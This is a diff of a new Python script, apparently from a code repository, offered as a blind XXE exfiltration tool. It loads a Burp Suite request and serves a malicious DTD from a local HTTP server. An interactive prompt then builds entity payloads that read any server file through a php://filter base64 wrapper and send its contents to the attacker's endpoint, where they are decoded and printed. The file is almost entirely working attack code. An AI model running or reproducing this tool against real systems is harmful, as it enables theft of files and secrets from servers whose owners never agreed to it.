|
| 1 | +import argparse |
| 2 | +from threading import Thread |
| 3 | +import http.server |
| 4 | +import requests |
| 5 | +import re |
| 6 | +from base64 import b64decode |
| 7 | +from cmd import Cmd |
| 8 | + |
| 9 | +# Setup payload to be global. |
| 10 | +payload = b'This would be the payload... IF IT EXISTED\n' |
| 11 | +endpoint = '' |
| 12 | + |
| 13 | +def load_request_from_file(filename, ssl=False): |
| 14 | + """ |
| 15 | + Load request from burpsuite file. |
| 16 | + """ |
| 17 | + with open(filename, 'r') as f: |
| 18 | + request_data = f.read() |
| 19 | + headers, body = request_data.replace('\r', '').split('\n\n') |
| 20 | + |
| 21 | + method = headers.split(' ')[0] |
| 22 | + path = headers.split(' ')[1] |
| 23 | + headers = dict([header.split(': ') for header in headers.split("\n")[1:]]) |
| 24 | + path = f'http://{headers["Host"]}{path}' |
| 25 | + if ssl: |
| 26 | + path = f'https://{headers["Host"]}{path}' |
| 27 | + |
| 28 | + # SYSTEM "http://10.10.14.8:8000/test.dtd |
| 29 | + search = re.search(r'SYSTEM "[https]*:\/\/(.*?)/', body) |
| 30 | + endpoint = search.group(1) |
| 31 | + |
| 32 | + return method, path, headers, body, endpoint |
| 33 | + |
| 34 | +class RequestHandler(http.server.BaseHTTPRequestHandler): |
| 35 | + def do_GET(self): |
| 36 | + self.send_response(200) |
| 37 | + self.send_header('Content-type','application/xml') |
| 38 | + self.end_headers() |
| 39 | + if self.path.endswith('.dtd'): |
| 40 | + """ |
| 41 | + If ends with DTD, we send the payload (global variable). |
| 42 | + """ |
| 43 | + self.wfile.write(payload.encode()) |
| 44 | + return |
| 45 | + elif self.path[:5] == '/b64/': |
| 46 | + """ |
| 47 | + Server is responding to us with base64 |
| 48 | + """ |
| 49 | + try: |
| 50 | + data = b64decode(self.path[5:]) |
| 51 | + print(data.decode()) |
| 52 | + except Exception as e: |
| 53 | + print(e) |
| 54 | + else: |
| 55 | + """ |
| 56 | + Unexpected currently |
| 57 | + """ |
| 58 | + print(self.path) |
| 59 | + return |
| 60 | + |
| 61 | +class Terminal(Cmd): |
| 62 | + prompt = 'xxe> ' |
| 63 | + def default(self, args): |
| 64 | + global payload |
| 65 | + payload = f"""<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={args}"> |
| 66 | +<!ENTITY % payload "<!ENTITY % run SYSTEM 'http://{endpoint}/b64/%file;'>"> %payload; |
| 67 | +%run;""" |
| 68 | + r = requests.request(method, path, headers=headers, data=body) |
| 69 | + |
| 70 | +def run(): |
| 71 | + server_address = ('', 8000) |
| 72 | + httpd = http.server.HTTPServer(server_address, RequestHandler) |
| 73 | + httpd.serve_forever() |
| 74 | + |
| 75 | +if __name__ == '__main__': |
| 76 | + parser = argparse.ArgumentParser(description='XXE Blind Injection Exfiltration') |
| 77 | + parser.add_argument('-r', '--request', help='Burpsuite Request File', required=True) |
| 78 | + parser.add_argument('-s', '--ssl', help='Use SSL', action='store_true') |
| 79 | + args = parser.parse_args() |
| 80 | + if args.ssl: |
| 81 | + method, path, headers, body, endpoint = load_request_from_file(args.request, ssl=True) |
| 82 | + else: |
| 83 | + method, path, headers, body, endpoint = load_request_from_file(args.request) |
| 84 | + |
| 85 | + # Start HTTP Server |
| 86 | + t = Thread(target=run) |
| 87 | + t.start() |
| 88 | + |
| 89 | + # Start Terminal |
| 90 | + terminal = Terminal() |
| 91 | + terminal.cmdloop() |
0 commit comments